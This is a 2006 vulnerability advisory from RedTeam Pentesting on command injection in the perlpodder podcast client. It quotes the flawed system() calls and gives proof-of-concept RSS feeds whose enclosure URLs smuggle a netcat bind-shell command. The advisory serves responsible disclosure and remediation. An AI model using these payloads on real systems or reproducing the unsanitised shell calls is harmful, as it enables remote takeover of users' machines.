rt-sa-2006-003.txt

2006-05-24T00:00:00
ID PACKETSTORM:46609
Type packetstorm
Reporter RedTeam Pentesting
Modified 2006-05-24T00:00:00

Description

                                        
Advisory: Perlpodder Remote Arbitrary Command Execution
  
RedTeam identified a security flaw in perlpodder which makes it possible  
for a malicious podcast server to execute arbitrary shell commands on  
the victim's client.  
  
  
Details  
=======  
  
Product: perlpodder  
Affected Versions: All versions up to perlpodder-0.4  
Fixed Versions: perlpodder-0.5  
Vulnerability Type: Remote arbitrary command execution  
Security-Risk: high  
Vendor-URL: http://perlpodder.sourceforge.net/  
Vendor-Status: informed, fixed  
Advisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2006-003.txt  
Advisory-Status: public  
CVE: GENERIC-MAP-NOMATCH  
CVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH  
  
  
Introduction  
============  
  
Perlpodder is a podcatcher script written in perl. It automates  
downloading podcasts.  
  
(from perlpodder SourceForge page)  
  
Podcasting is the distribution of multimedia files over the internet.
Normally, a server provides an RSS or Atom XML feed describing where
to get the multimedia files. The client parses the feed and may then
download the desired files.
  
  
More Details  
============  
  
When perlpodder is used to fetch a podcast, it extracts the URL of the
audio file from the XML file the server provides. The URLs are saved in
the variable "$dlset". There are two places in the code where this
variable is used together with the system() command:
  
The first usage is with "echo" to log the URL (line 278):  
  
[...]  
277 # add urls to log file to mark as retrieved  
278 $addurl = "echo " . $dlset . " >> $log_path ";  
279 system $addurl;  
[...]  
  
The second usage is with "wget" to actually fetch the audio file (line  
294):  
  
[...]  
291 # Prepair to call wget  
292  
293 $wget_path = "$cwd". "$datadir" ;  
294 $wget_cmd = "wget --quiet --background -o /dev/null -c --tries=2 --timeout=20 --random-wait " . $dlset . " -P ". $wget_path ;
295  
296 if ($DEBUG > 0) {  
297  
298 print "running " . $wget_cmd . "\n" ;  
299  
300 }  
301  
302 system $wget_cmd;  
[...]  
  
Unfortunately, $dlset is never properly sanitized, so it is possible for  
the remote server to include arbitrary shell commands in the URL which  
will then be executed using system() (lines 279 and 302).  
  
  
Proof of Concept  
================  
  
A minimal malicious server RSS feed which exploits the "echo" call may
look as follows:
  
<?xml version="1.0" encoding="UTF-8"?>  
<?xml-stylesheet type="text/xsl"?>  
<rss version="2.0">  
<channel>  
<title>RedTeam Pentesting Example Malicious Server Feed</title>  
  
<item>  
<enclosure url="http://www.example.com/example.mp3 >> /dev/null; nc   
-e /bin/sh -l -p 1337 &#"  
length="241734" type="audio/mpeg" />  
</item>  
</channel>  
</rss>  
  
The URL above will open port 1337 via netcat on the victim's computer  
and bind a shell to it. This is just one example of how to exploit the  
vulnerability, as arbitrary commands can be included in the URL, but it  
should illustrate the point.  
  
To exploit the "wget" call, the URL just has to be minimally adjusted:  
  
<?xml version="1.0" encoding="UTF-8"?>  
<?xml-stylesheet type="text/xsl"?>  
<rss version="2.0">  
<channel>  
<title>RedTeam Pentesting</title>  
  
<item>  
<enclosure url="http://www.example.com/example.mp3; nc -e /bin/sh -l   
-p 1337 &#"  
length="241734" type="audio/mpeg" />  
</item>  
</channel>  
</rss>  
  
  
Workaround  
==========  
  
Do not use perlpodder with untrusted servers.  
  
  
Fix  
===  
  
Upgrade to perlpodder-0.5 immediately[1].  
  
  
Security Risk  
=============  
  
High, because arbitrary shell commands can be executed on the victim's  
computer with the privileges of perlpodder (normally the user's  
privileges).  
  
  
History  
=======  
  
2006-05-19 Discovery of the problem  
2006-05-19 Notification of the author  
2006-05-21 Fixed version of perlpodder is released  
2006-05-22 Email from author pointing out the release  
2006-05-22 Public release of the advisory without CVE  
number because of public release by the  
author. CVE will be appended when available.  
  
  
  
References  
==========  
  
[1] http://prdownloads.sourceforge.net/perlpodder/perlpodder-0.5.tar.gz?download
  
  
RedTeam  
=======  
  
RedTeam Pentesting offers individual penetration tests ("pentests" for
short), performed by a team of specialised IT security experts. In this
way, security weaknesses in company networks are uncovered and can be
repaired immediately.

As there are only a few experts in this field, RedTeam wants to share
its knowledge and enhance public knowledge through research in
security-related areas. The results are made available as public
security advisories.
  
More information about RedTeam can be found at  
http://www.redteam-pentesting.de.  
  
--   
RedTeam Pentesting Tel.: +49-(0)241-963 1300  
Dennewartstr. 25-27 Fax : +49-(0)241-963 1304  
52068 Aachen http://www.redteam-pentesting.de  